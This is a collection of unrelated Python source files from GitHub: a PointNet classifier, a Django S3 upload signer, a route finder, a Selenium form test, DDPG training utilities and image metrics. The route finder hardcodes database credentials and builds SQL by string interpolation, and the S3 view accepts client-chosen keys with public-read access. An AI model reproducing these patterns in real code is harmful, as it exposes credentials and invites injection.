kernel_size=1, padding=\"valid\")(x)\n x = layers.BatchNormalization(momentum=0.0)(x)\n return layers.Activation(\"relu\")(x)\n\n\ndef dense_bn(x, filters):\n x = layers.Dense(filters)(x)\n x = layers.BatchNormalization(momentum=0.0)(x)\n return layers.Activation(\"relu\")(x)\n\n\ndef tnet(inputs, num_features):\n\n # Initalise bias as the indentity matrix\n bias = keras.initializers.Constant(np.eye(num_features).flatten())\n reg = OrthogonalRegularizer(num_features)\n\n x = conv_bn(inputs, 32)\n x = conv_bn(x, 64)\n x = conv_bn(x, 512)\n x = layers.GlobalMaxPooling1D()(x)\n x = dense_bn(x, 256)\n x = dense_bn(x, 128)\n x = layers.Dense(\n num_features * num_features,\n kernel_initializer=\"zeros\",\n bias_initializer=bias,\n activity_regularizer=reg,\n )(x)\n feat_T = layers.Reshape((num_features, num_features))(x)\n # Apply affine transformation to input features\n return layers.Dot(axes=(2, 1))([inputs, feat_T])\n\n\ndef get_pointnet_model(num_points=2048):\n inputs = keras.Input(shape=(num_points, 3))\n\n x = tnet(inputs, 3)\n x = conv_bn(x, 32)\n x = conv_bn(x, 32)\n x = tnet(x, 32)\n x = conv_bn(x, 32)\n x = conv_bn(x, 64)\n x = conv_bn(x, 512)\n x = layers.GlobalMaxPooling1D()(x)\n x = dense_bn(x, 256)\n x = layers.Dropout(0.3)(x)\n x = dense_bn(x, 128)\n x = layers.Dropout(0.3)(x)\n\n outputs = layers.Dense(1, activation=\"sigmoid\")(x)\n\n model = keras.Model(inputs=inputs, outputs=outputs, name=\"pointnet\")\n return model\n\n\ndef parse_dataset(files, num_points=2048, test_size=1000):\n rnd = np.random.default_rng(12345)\n rnd.shuffle(files)\n points = []\n labels = []\n\n for file in files:\n labels.append(0 if 'NonChair' in str(file.parent) else 1)\n points.append(trimesh.load(file).sample(num_points))\n\n train_points = points[:-test_size]\n train_labels = labels[:-test_size]\n test_points = points[-test_size:]\n test_labels = labels[-test_size:]\n\n return (\n np.array(train_points),\n np.array(test_points),\n np.array(train_labels),\n np.array(test_labels)\n )\n\n\ndef augment(points, label):\n # 
jitter points\n points += tf.random.uniform(points.shape, -0.005, 0.005, dtype=tf.float64)\n # shuffle points\n points = tf.random.shuffle(points)\n return points, label\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Run PointNet network')\n parser.add_argument('--dir', type=str, default=None,\n help='Directory of chair voxel files')\n parser.add_argument('--load', type=str, default='pointnet.h5',\n help='Path to load dataset from')\n parser.add_argument('--train', action='store_true', default=False,\n help='Run model in train mode')\n parser.add_argument('--points', type=int, default=2048,\n help='Number of points to sample')\n\n args = parser.parse_args()\n NUM_POINTS = args.points if args.points > 0 else 2048\n BATCH_SIZE = 32\n\n if args.train:\n model = get_pointnet_model(NUM_POINTS)\n\n model.compile(\n loss=\"binary_crossentropy\",\n optimizer=keras.optimizers.Adam(learning_rate=0.0005),\n metrics=[\"acc\"],\n )\n\n files = list(Path(args.dir).glob('**/*.obj'))\n train_points, test_points, train_labels, test_labels = parse_dataset(files, NUM_POINTS)\n np.save('train_points.npy', train_points)\n np.save('test_points.npy', test_points)\n np.save('train_labels.npy', train_labels)\n np.save('test_labels.npy', test_labels)\n # train_points = np.load('train_points.npy')\n # test_points = np.load('test_points.npy')\n # train_labels = np.load('train_labels.npy')\n # test_labels = np.load('test_labels.npy')\n\n train_dataset = tf.data.Dataset.from_tensor_slices((train_points, train_labels))\n test_dataset = tf.data.Dataset.from_tensor_slices((test_points, test_labels))\n\n train_dataset = train_dataset.shuffle(len(train_points)).map(augment).batch(BATCH_SIZE)\n test_dataset = test_dataset.shuffle(len(test_points)).batch(BATCH_SIZE)\n\n # Define callbacks.\n log_dir = \"logs/fit/pointnet\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_cb = keras.callbacks.TensorBoard(\n log_dir=log_dir, histogram_freq=1\n )\n checkpoint_cb = keras.callbacks.ModelCheckpoint(\n \"pointnet.h5\", save_best_only=True\n )\n early_stopping_cb = keras.callbacks.EarlyStopping(\n monitor=\"val_acc\", patience=15\n )\n\n epochs = 100\n model.fit(\n train_dataset,\n validation_data=test_dataset,\n epochs=epochs,\n callbacks=[checkpoint_cb, early_stopping_cb, tensorboard_cb],\n )\n\n else:\n custom_objects = {\"OrthogonalRegularizer\": OrthogonalRegularizer}\n with keras.utils.custom_object_scope(custom_objects):\n model = keras.models.load_model(args.load)\n\n files = list(Path(args.dir).glob('**/*.obj'))\n points = []\n for file in files:\n points.append(trimesh.load(file).sample(NUM_POINTS))\n\n points = np.array(points)\n result = model.predict(points)\n for i, file in enumerate(files):\n print(\"{}: {:.3f}%\".format(file, result[i][0] * 100))\n","repo_name":"allantsai3/chairy","sub_path":"scorer/pointnet.py","file_name":"pointnet.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"968576130","text":"import os\nimport boto3\nfrom django.views import View\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, reverse, redirect\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n\nclass SignS3View(LoginRequiredMixin, View):\n def get(self, request):\n S3_BUCKET_NAME = os.environ.get('S3_BUCKET_NAME')\n\n file_name = request.GET.get('file_name')\n file_type = request.GET.get('file_type')\n\n s3_client = boto3.client('s3')\n\n 
presigned_post = s3_client.generate_presigned_post(\n Bucket=S3_BUCKET_NAME,\n Key=file_name,\n Fields={\"acl\": \"public-read\", \"Content-Type\": file_type},\n Conditions=[\n {\"acl\": \"public-read\"},\n {\"Content-Type\": file_type}\n ],\n ExpiresIn=3600\n )\n\n return JsonResponse({\n 'data': presigned_post,\n 'url': 'https://%s.s3.amazonaws.com/%s' % (S3_BUCKET_NAME, file_name)\n })\n","repo_name":"jcquinlan/colophon","sub_path":"core/views/s3/sign_s3.py","file_name":"sign_s3.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29270076932","text":"import mysql.connector\nfrom collections import deque\nimport math\nfrom random import randint\n\nclass MapWay:\n\n def __init__(self):\n self.mydb = mysql.connector.connect(\n host='std-mysql',\n user='std_1455_map_way',\n passwd='12345678',\n database='std_1455_map_way'\n )\n\n def findBestWay(self,\n points=None):\n start_point = points[0]\n end_point = points[1]\n ans = [points[0]]\n\n places_in_zone = self.inZone(first_point=start_point, second_point=end_point)\n start_point.category, end_point.category = 'Start_point', 'End_point'\n places_in_zone.append(start_point)\n places_in_zone.append(end_point)\n self.matrix_size_x = len(places_in_zone)\n matrix_places = [[math.inf] * self.matrix_size_x for _ in range(self.matrix_size_x)]\n\n for i in range(self.matrix_size_x):\n for _ in range(4):\n rnd_num = randint(0, self.matrix_size_x - 1)\n if (((places_in_zone[i].category == 'Start_point' and places_in_zone[rnd_num] == 'End_point') or\n (places_in_zone[i].category == 'End_point' and places_in_zone[rnd_num] == 'Start_point')) and\n self.matrix_size_x > 2):\n matrix_places[i][rnd_num] = math.inf\n else:\n matrix_places[i][rnd_num] = self.getLength(places_in_zone[i], places_in_zone[rnd_num])\n\n '''\n\n S\n \\\n \\\n \\\n *-------E\n\n I will use Dijkstra's algorithm to find the path, but will also search by the point\n the user likes most and by the time remaining to the end\n '''\n\n start_point = len(matrix_places) - len(points)\n end_point = len(matrix_places) - 1\n dist = [math.inf] * len(matrix_places)\n way = [0] * len(matrix_places)\n way[start_point] = start_point # the start vertex is its own predecessor\n dist[start_point] = 0\n Q = deque()\n Q.append(len(places_in_zone) - len(points))\n while Q:\n v = Q.pop()\n for u in range(len(matrix_places[v])):\n if (dist[u] > dist[v] + matrix_places[v][u]):\n dist[u] = dist[v] + matrix_places[v][u]\n way[u] = v\n Q.append(u)\n\n '''\n\n To reconstruct the optimal path from the start vertex\n to the end vertex we simply walk the predecessor array,\n in which the minimum distances to the start vertex were recorded,\n greedily taking the smallest value at each step\n\n '''\n\n road = [end_point]\n now_point = end_point\n while way[now_point] != now_point:\n now_point = way[now_point]\n road.append(now_point)\n\n for i in list(reversed(road)):\n ans.append(places_in_zone[i])\n\n return ans\n\n def inZone(self,\n first_point=None,\n second_point=None):\n '''\n TODO: add a lookup over the neighbourhood of the points to capture more candidate places\n\n y y\n ^ ^\n X---------------------- --------------------Y\n | * | | * | *\n | | * * | * |\n | * * | | |\n | | | * |\n * | | | |\n | * * | * | | *\n | | * | * |\n * ----------------------Y > x X-------------------- > x\n\n '''\n\n if first_point.longitude <= second_point.longitude:\n left_point = first_point\n right_point = second_point\n else:\n left_point = second_point\n right_point = 
first_point\n\n\n query = f'SELECT * FROM Place WHERE ({left_point.latitude} >= {right_point.latitude} and (Place.longitude <= ' \\\n f'{right_point.longitude} and (Place.longitude >= {left_point.longitude} and Place.latitude <= ' \\\n f'{left_point.latitude} and Place.latitude >= {right_point.latitude})) or ({left_point.latitude} < ' \\\n f'{right_point.latitude} and (Place.longitude <= {right_point.longitude} and Place.longitude >= ' \\\n f'{left_point.longitude} and Place.latitude <= {right_point.latitude} and Place.latitude >= ' \\\n f'{left_point.latitude})));'\n mycursor = self.mydb.cursor()\n mycursor.execute(query)\n places = mycursor.fetchall()\n places_in_zone = []\n for x in places:\n place = Place(id=x[0], name=x[1], category=x[2], latitude=x[3], longitude=x[4])\n places_in_zone.append(place)\n\n return places_in_zone\n\n def getLength(self, first_point, second_point):\n '''\n :param first_point:\n :param second_point:\n Брать\n :return:\n '''\n import math\n return math.sqrt((first_point.latitude - second_point.latitude) ** 2 +\n (first_point.longitude - second_point.longitude) ** 2)\n\nclass Place:\n\n def __init__(self, id=None, name=None, category=None, longitude=None, latitude=None):\n self.id = id\n self.name = name\n self.category = category\n self.longitude = longitude\n self.latitude = latitude\n","repo_name":"HehexOne/MapWay","sub_path":"Algos and notebooks/newMapWay.py","file_name":"newMapWay.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9072784856","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nimport time\r\n\r\nclass webForm:\r\n def test(self):\r\n base_url = \"https://www.ultimateqa.com/filling-out-forms/\"\r\n driver = webdriver.Chrome()\r\n driver.maximize_window()\r\n driver.get(base_url)\r\n driver.implicitly_wait(5)\r\n\r\n driver.find_element(By.ID, \"et_pb_contact_name_1\").send_keys(\"Second name field\")\r\n driver.find_element(By.ID, \"et_pb_contact_message_1\").send_keys(\"Second message text-box field\")\r\n\r\n # Reading captcha details below\r\n x = driver.find_element(By.XPATH, \"//input[@name='et_pb_contact_captcha_1']\").get_attribute(\"data-first_digit\")\r\n y = driver.find_element(By.XPATH, \"//input[@name='et_pb_contact_captcha_1']\").get_attribute(\"data-second_digit\")\r\n captureSum = str(int(x) + int(y))\r\n\r\n driver.find_element(By.XPATH, \"//input[@name='et_pb_contact_captcha_1']\").send_keys(captureSum)\r\n buttons = driver.find_elements_by_class_name(\"et_pb_contact_submit\")[1].click()\r\n\r\n # checking for the success message and print to console\r\n uiResponse = driver.find_element_by_css_selector(\"[class='et-pb-contact-message'] > p \")\r\n message = uiResponse.text\r\n print(message)\r\n time.sleep(10)\r\n\r\nif __name__ == '__main__':\r\n wf = webForm()\r\n wf.test()","repo_name":"ellogutu/qa_tests","sub_path":"ui_automation_test.py","file_name":"ui_automation_test.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36792866373","text":"# Set a random seed for reproducibility\ns = 2\n# Set pseudo-random generator seeds in Python, NumPy, and TensorFlow\nimport random\nrandom.seed(s)\nimport numpy as np\nnp.random.seed(s)\nimport tensorflow as tf\ntf.random.set_seed(s)\n\nfrom tensorflow.keras import layers\nfrom typing import Union\n\nclass OUActionNoise:\n \"\"\"\n 
Ornstein-Uhlenbeck correlated noise. Heavily based on Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n \"\"\"\n def __init__(self, mean: float, std_deviation: float, theta: float=0.15, \n dt: float=1e-2, x_initial: Union[np.ndarray, list, None]=None):\n # Set noise amplitude\n self.theta = theta\n # Set noise mean\n self.mean = mean\n # Set noise standard deviation\n self.std_dev = std_deviation\n # Set noise time step\n self.dt = dt\n # Set initial state\n self.x_initial = x_initial\n # Reset the noise object\n self.reset()\n\n def __call__(self) -> Union[np.ndarray, list]:\n \"\"\"\n Determine the noise signal when calling an instance of this class.\n Based on Hemant Singh's implementation of DDPG in Keras: \n https://keras.io/examples/rl/ddpg_pendulum/ and on the discretization of\n the Ornstein-Uhlenbeck process described in:\n https://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab\n Returns:\n Union[np.ndarray, list]: Correlated noise signal\n \"\"\"\n x = (\n self.x_prev\n + self.theta * (self.mean - self.x_prev) * self.dt\n + self.std_dev * np.sqrt(self.dt) * np.random.normal(size=self.mean.shape, scale=self.std_dev)\n )\n\n # Store previous noise signal for later use\n self.x_prev = x\n\n return x\n\n def reset(self):\n \"\"\"\n Reset the noise object\n \"\"\"\n if self.x_initial is not None:\n self.x_prev = self.x_initial\n else:\n self.x_prev = np.zeros_like(self.mean)\n\nclass Buffer:\n \"\"\"\n Replay buffer from which to draw experiences and learn both the critic function \n and the actor policy.\n Heavily based on Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n\n \"\"\"\n def __init__(self, num_states: int, num_actions: int, \n buffer_capacity: int=100000, batch_size: int=64):\n \"\"\"\n Initialize instance of the Buffer class\n\n Args:\n num_states (int): Dimension of state space\n num_actions (int): Dimension of action space\n buffer_capacity (int, optional): Maximum number of transitions to store. Defaults to 100000.\n batch_size (int, optional): Size of the training mini-batches. 
Defaults to 64.\n \"\"\"\n # Maximum number of transitions to store\n self.buffer_capacity = buffer_capacity\n # Size of the training mini-batch\n self.batch_size = batch_size\n\n # Count the number of records (can exceed self.buffer_capacity)\n self.buffer_counter = 0\n\n # Create one buffer per element in the (s, a, r, s') transition\n self.state_buffer = np.zeros((self.buffer_capacity, num_states))\n self.action_buffer = np.zeros((self.buffer_capacity, num_actions))\n self.reward_buffer = np.zeros((self.buffer_capacity, 1))\n self.next_state_buffer = np.zeros((self.buffer_capacity, num_states))\n\n def record(self, obs_tuple: tuple):\n \"\"\"\n Save a (s, a, r, s') transition to the buffer\n\n Args:\n obs_tuple (tuple): (s, a, r, s') transition\n \"\"\"\n\n # Create an index to replace either the oldest record or \n # a random record with 0.8 and 0.2 probability, respectively\n if self.buffer_counter == 0:\n index = 0\n else:\n index = np.random.choice([self.buffer_counter % self.buffer_capacity, np.random.randint(0, min(self.buffer_counter, self.buffer_capacity))], p=[0.8, 0.2])\n\n # Store the components of the tuple in their respective buffers\n self.state_buffer[index] = obs_tuple[0]\n self.action_buffer[index] = obs_tuple[1]\n self.reward_buffer[index] = obs_tuple[2]\n self.next_state_buffer[index] = obs_tuple[3]\n\n # Add to the buffer counter\n self.buffer_counter += 1\n\n @tf.function\n def update(\n self, gamma: float, target_actor: tf.keras.Model, target_critic: tf.keras.Model,\n critic_model: tf.keras.Model, critic_optimizer: tf.keras.optimizers.Optimizer,\n actor_model: tf.keras.Model, actor_optimizer: tf.keras.optimizers.Optimizer, \n state_batch: tf.Tensor, action_batch: tf.Tensor, reward_batch: tf.Tensor, next_state_batch: tf.Tensor\n ):\n \"\"\"\n Update actor and critic networks' weights according to the DDPG algorithm\n Args:\n gamma (float): Discount rate for future rewards\n target_actor (tf.keras.Model): Target actor network\n target_critic (tf.keras.Model): Target critic network\n critic_model (tf.keras.Model): Main critic network\n critic_optimizer (tf.keras.optimizers.Optimizer): Optimizer for the critic network\n actor_model (tf.keras.Model): Main actor network\n actor_optimizer (tf.keras.optimizers.Optimizer): Optimizer for the actor network\n state_batch (tf.Tensor): Mini-batch of states\n action_batch (tf.Tensor): Mini-batch of actions\n reward_batch (tf.Tensor): Mini-batch of rewards\n next_state_batch (tf.Tensor): Mini-batch of next states\n \"\"\"\n # Track operations for automatic differentiation\n with tf.GradientTape() as tape:\n # Find the actions taken by the target actor\n target_actions = target_actor(next_state_batch, training=True)\n # Calculate the y term from the DDPG algorithm\n y = reward_batch + gamma * target_critic(\n [next_state_batch, target_actions], training=True\n )\n # Calculate the main critic's values assigned to the target's chosen actions\n critic_value = critic_model([state_batch, action_batch], training=True)\n # Calculate the critic loss from the DDPG algorithm\n critic_loss = tf.math.reduce_mean(tf.math.square(y - critic_value))\n\n # Take the gradient of the critic loss\n critic_grad = tape.gradient(critic_loss, critic_model.trainable_variables)\n # Clip the gradient to avoid exploding gradients\n critic_grad, _ = tf.clip_by_global_norm(critic_grad, 5.0)\n # Apply the gradients to the critic optimizer\n critic_optimizer.apply_gradients(\n zip(critic_grad, critic_model.trainable_variables)\n )\n\n with tf.GradientTape() as 
tape:\n # Get the actions chosen by the actor given the mini-batch of states\n actions = actor_model(state_batch, training=True)\n # Get the critic's value of the states and actor's chosen actions\n critic_value = critic_model([state_batch, actions], training=True)\n # The aim when training the actor is to maximize the critic's value, \n # which is equivalent to minimizing its negative\n actor_loss = -tf.math.reduce_mean(critic_value)\n\n # Take the gradient of the actor loss\n actor_grad = tape.gradient(actor_loss, actor_model.trainable_variables)\n # Clip the gradient to avoid exploding gradients\n actor_grad, _ = tf.clip_by_global_norm(actor_grad, 5.0)\n # Apply the gradients to the actor optimizer\n actor_optimizer.apply_gradients(\n zip(actor_grad, actor_model.trainable_variables)\n )\n\n def learn(self, gamma: float, target_actor: tf.keras.Model, \n target_critic: tf.keras.Model, critic_model: tf.keras.Model,\n critic_optimizer: tf.keras.optimizers.Optimizer,\n actor_model: tf.keras.Model, \n actor_optimizer: tf.keras.optimizers.Optimizer):\n \"\"\"\n Carry out offline learning from the replay buffer\n\n Args:\n gamma (float): Discount rate for future rewards\n target_actor (tf.keras.Model): Target actor model\n target_critic (tf.keras.Model): Target critic model\n critic_model (tf.keras.Model): Main critic model\n critic_optimizer (tf.keras.optimizers.Optimizer): Optimizer for the critic model\n actor_model (tf.keras.Model): Main actor model\n actor_optimizer (tf.keras.optimizers.Optimizer): Optimizer for the actor model\n \"\"\"\n # Get sampling range\n record_range = min(self.buffer_counter, self.buffer_capacity)\n # Draw a random set of indices to form the minibatches\n batch_indices = np.random.choice(record_range, self.batch_size)\n\n # Convert minibatches to tensors\n state_batch = tf.convert_to_tensor(self.state_buffer[batch_indices])\n action_batch = tf.convert_to_tensor(self.action_buffer[batch_indices])\n reward_batch = tf.convert_to_tensor(self.reward_buffer[batch_indices])\n reward_batch = tf.cast(reward_batch, dtype=tf.float32)\n next_state_batch = tf.convert_to_tensor(self.next_state_buffer[batch_indices])\n\n # Update main critic and actor networks' weights\n self.update(gamma, target_actor, target_critic,\n critic_model, critic_optimizer,\n actor_model, actor_optimizer, state_batch, action_batch, reward_batch, next_state_batch)\n\n\n@tf.function\ndef update_target(target_weights: list, weights: list, tau: float):\n \"\"\"\n Update the target networks with an update rate tau.\n Taken from Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n\n Args:\n target_weights (list): List of target network's weights\n weights (list): List of main network's weights\n tau (float): Update rate (<< 1)\n \"\"\"\n for (a, b) in zip(target_weights, weights):\n # Update the weights \n a.assign(b*tau + a*(1 - tau))\n\ndef get_actor(num_states: int, num_actions: int, upper_bound: float) -> tf.keras.Model:\n \"\"\"\n Create an actor neural network. 
Heavily based on Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n\n Args:\n num_states (int): Dimension of the state space\n num_actions (int): Dimension of the action space\n upper_bound (float): Upper bound of the actions (actions are assumed symmetrical around 0)\n\n Returns:\n tf.keras.Model: Actor neural network\n \"\"\"\n # Initialize weights between -3e-3 and 3e-3 to make sure gradients do not go to zero in first steps\n last_init = tf.random_uniform_initializer(minval=-3e-3, maxval=3e-3)\n\n # Take the state as input\n inputs = layers.Input(shape=(num_states,), name='State')\n # Add two dense, ReLU-activated layers \n out = layers.Dense(256, activation=\"relu\", name='Hidden_1')(inputs)\n out = layers.Dense(256, activation=\"relu\", name='Hidden_2')(out)\n # Add a layer that gives the action (normalized between -1 and 1)\n outputs = layers.Dense(num_actions, activation=\"tanh\", kernel_initializer=last_init, name='Normalized_action')(out)\n\n # De-normalize the action with the upper bound of the action space\n outputs = outputs * upper_bound\n # Create and return the full model\n model = tf.keras.Model(inputs, outputs)\n return model\n\n\ndef get_critic(num_states: int, num_actions: int) -> tf.keras.Model:\n \"\"\"\n Create a critic neural network. Heavily based on Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n\n Args:\n num_states (int): Dimension of the state space\n num_actions (int): Dimension of the action space\n\n Returns:\n tf.keras.Model: Critic neural network\n \"\"\"\n # Take the state as an input\n state_input = layers.Input(shape=(num_states), name='State')\n # Add three dense, ReLU-activated layers\n state_out = layers.Dense(16, activation=\"relu\", name='Hidden_1')(state_input)\n state_out = layers.Dense(16, activation=\"relu\", name='Hidden_2')(state_out)\n state_out = layers.Dense(32, activation=\"relu\", name='Hidden_3')(state_out)\n\n # Take the action as an input\n action_input = layers.Input(shape=(num_actions), name='Action')\n # Add two dense, ReLU-activated layers\n action_out = layers.Dense(32, activation=\"relu\", name='Hidden_4')(action_input)\n action_out = layers.Dense(32, activation=\"relu\", name='Hidden_5')(action_out)\n\n # Concatenate the state and action 'branches'\n concat = layers.Concatenate(name='Concatenate')([state_out, action_out])\n\n # Add two fully connected, ReLU-activated layers\n out = layers.Dense(256, activation=\"relu\", name='Hidden_6')(concat)\n out = layers.Dense(256, activation=\"relu\", name='Hidden_7')(out)\n # Give the Q value of the state, action pair as output\n outputs = layers.Dense(1, name='Q_value')(out)\n\n # Create and return the full model\n model = tf.keras.Model([state_input, action_input], outputs)\n\n return model\n\ndef policy(state: tf.Tensor, actor_model: tf.keras.Model,\n noise_object: OUActionNoise, add_noise: bool=True, \n lower_bound: float=-np.pi/2, upper_bound: float=np.pi/2) -> np.ndarray:\n \"\"\"\n Policy function that optionally adds noise to the actor model's chosen action\n Heavily based on Hemant Singh's implementation of DDPG\n in Keras: https://keras.io/examples/rl/ddpg_pendulum/\n\n Args:\n state (tf.Tensor): Current state (has to be a tf.Tensor)\n actor_model (tf.keras.Model): Actor model that maps states to actions\n noise_object (OUActionNoise): Correlated noise object\n add_noise (bool, optional): Whether to add noise to the policy. 
Defaults to True.\n lower_bound (float, optional): Lower bound for clipping. Defaults to -np.pi/2.\n upper_bound (float, optional): Upper bound for clipping. Defaults to np.pi/2.\n\n Returns:\n np.ndarray: Chosen action given the input state\n \"\"\"\n # Get action out of the current state\n sampled_actions = tf.squeeze(actor_model(state))\n # Call the noise object to get the noise signal\n noise = noise_object()\n # Optionally add the noise to the selected action\n if add_noise:\n sampled_actions = sampled_actions.numpy() + noise\n else:\n sampled_actions = sampled_actions.numpy()\n\n # Clip the action to make it fit within the specified bounds\n legal_action = np.clip(sampled_actions, lower_bound, upper_bound)\n\n return np.squeeze(legal_action)","repo_name":"santiagvalencia/ddpg_helicopter","sub_path":"training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":14707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32168035413","text":"import math\nimport numpy as np\nimport mmcv\nfrom .ssim import structural_similarity\n\nSSIM = structural_similarity\n\ndef PSNR(x, gt, maxval=255, shave_border=0):\n x = x.astype(float)\n gt = gt.astype(float)\n height, width = x.shape[:2]\n x = x[shave_border:height - shave_border, shave_border:width - shave_border]\n gt = gt[shave_border:height - shave_border, shave_border:width - shave_border]\n diff = x - gt\n RMSE = math.sqrt(np.mean(diff ** 2))\n if RMSE == 0:\n return 100\n return 20 * math.log10(maxval / RMSE)\n\n\ndef PSNR_B(x, gt, blockSize=8, maxval=255):\n x = x.astype(float)\n gt = gt.astype(float)\n height, width = x.shape[:2]\n\n B = blockSize # block size\n Nh = width\n Nv = height\n \n Nhb = Nv * (Nh/B - 1)\n Nvb = Nh * (Nv/B - 1)\n Nhbc = Nv * (Nh - 1) - Nhb\n Nvbc = Nh * (Nv - 1) - Nvb\n\n Idx_H = range(1, Nh)\n Idx_Hb = range(B, Nh, B)\n Idx_Hbc = np.setxor1d(Idx_H, Idx_Hb)\n Idx_V = range(1, Nv)\n Idx_Vb = range(B, Nv, B)\n Idx_Vbc = np.setxor1d(Idx_V, Idx_Vb)\n\n Db = 0\n Dbc = 0\n for i in Idx_Hb:\n Db += np.sum(np.power(x[:,i-1,...] - x[:,i,...], 2))\n for i in Idx_Vb:\n Db += np.sum(np.power(x[i-1,:,...] - x[i,:,...], 2))\n for i in Idx_Hbc:\n Dbc += np.sum(np.power(x[:,i-1,...] - x[:,i,...], 2))\n for i in Idx_Vbc:\n Dbc += np.sum(np.power(x[i-1,:,...] - x[i,:,...], 2))\n Db = Db / (Nhb + Nvb)\n Dbc = Dbc / (Nhbc + Nvbc)\n\n eta = np.log2(B) / np.log2(np.minimum(Nh, Nv)) if Db > Dbc else 0\n BEF = eta * (Db - Dbc)\n\n MSE = np.mean((x - gt) ** 2)\n MSE_B = MSE + BEF\n PSNR_B = 10 * np.log10(maxval**2 / MSE_B)\n return PSNR_B\n\n\ndef psnr_mmcv(img1, img2, crop_border=0, input_order='HWC', convert_to=None):\n assert img1.shape == img2.shape, (\n f'Image shapes are different: {img1.shape}, {img2.shape}.')\n if input_order not in ['HWC', 'CHW']:\n raise ValueError(\n f'Wrong input_order {input_order}. Supported input_orders are '\n '\"HWC\" and \"CHW\"')\n\n img1, img2 = img1.astype(np.float32), img2.astype(np.float32)\n if isinstance(convert_to, str) and convert_to.lower() == 'y':\n img1 = mmcv.bgr2ycbcr(img1 / 255., y_only=True) * 255.\n img2 = mmcv.bgr2ycbcr(img2 / 255., y_only=True) * 255.\n elif convert_to is not None:\n raise ValueError('Wrong color model. 
Supported values are '\n '\"Y\" and None.')\n\n if crop_border != 0:\n img1 = img1[crop_border:-crop_border, crop_border:-crop_border, None]\n img2 = img2[crop_border:-crop_border, crop_border:-crop_border, None]\n\n mse_value = np.mean((img1 - img2)**2)\n if mse_value == 0:\n return float('inf')\n return 20. * np.log10(255. / np.sqrt(mse_value))\n","repo_name":"ACALJJ32/Compressed_Image","sub_path":"src/utils/util_metric.py","file_name":"util_metric.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11829502237","text":"import sys\nimport logging\nfrom joblib import dump\n\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.pipeline import Pipeline\nfrom string import Template\nimport yaml\n\n\ndef get_config():\n with open(r\"config.yml\") as file:\n config = yaml.safe_load(file)\n return config\n\n\ndef build_logger(name):\n logging.basicConfig(\n format=\"%(asctime)s %(levelname)s:%(name)s: %(message)s\",\n level=logging.INFO,\n datefmt=\"%H:%M:%S\",\n stream=sys.stderr,\n )\n logger = logging.getLogger(name)\n return logger\n\n\ndef update_model(model: Pipeline) -> None:\n \"\"\"Updates a model file.\n\n Args:\n model (Pipeline): a model to save.\n \"\"\"\n config = get_config()\n dump(model, config[\"path\"][\"model\"])\n\n\ndef save_simple_metrics_report(\n train_score: float, test_score: float, validation_score: float, model: Pipeline\n) -> None:\n config = get_config()\n with open(config[\"path\"][\"report\"], \"w\") as report_file:\n report_file.write(\"# Model Report\\n\\n\")\n report_file.write(\"## Model Pipeline Description\\n\\n\")\n for key, value in model.named_steps.items():\n report_file.write(f\"* **{key}:** {value}\\n\")\n report_file.write(\"\\n\")\n report_file.write(\"## Metrics\\n\\n\")\n report_template = Template(config[\"report_template\"])\n report_updated = report_template.substitute(\n train_score=f\"{train_score:.5f}\",\n test_score=f\"{test_score:.5f}\",\n validation_score=f\"{validation_score:.5f}\",\n )\n report_file.write(r\"{}\".format(report_updated))\n\n\ndef get_model_performance(y_real: pd.Series, y_pred: pd.Series):\n config = get_config()\n fig, ax = plt.subplots()\n fig.set_figheight(8)\n fig.set_figwidth(8)\n sns.regplot(x=y_pred, y=y_real, ax=ax)\n ax.set_xlabel(\"Predicted worldwide gross\")\n ax.set_ylabel(\"Real world wide gross\")\n ax.set_title(\"Behaviour of model performance\")\n fig.savefig(config[\"path\"][\"image_behaviour\"])\n","repo_name":"nelsoncardenas/intro-deployment-ml-model","sub_path":"src/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71460508328","text":"def runFirst(input):\n numbers = {}\n for line in input:\n number = int(line)\n target = 2020 - number\n if (target in numbers):\n return target * number\n numbers[number] = 1\n\ndef runSecond(input):\n numbers = {}\n for line in input:\n num1 = int(line)\n\n for num2 in numbers:\n target = 2020 - num1 - num2\n if (target in numbers):\n return target * num1 * num2\n numbers[num1] = 1\n\n\ndef main():\n with open(\"input.txt\", \"r\") as file:\n input = file.readlines()\n \n result = runFirst(input)\n print(result)\n \n result = runSecond(input)\n print(result)\n\nif (__name__ == \"__main__\"):\n 
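# read input.txt and run both parts of the puzzle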
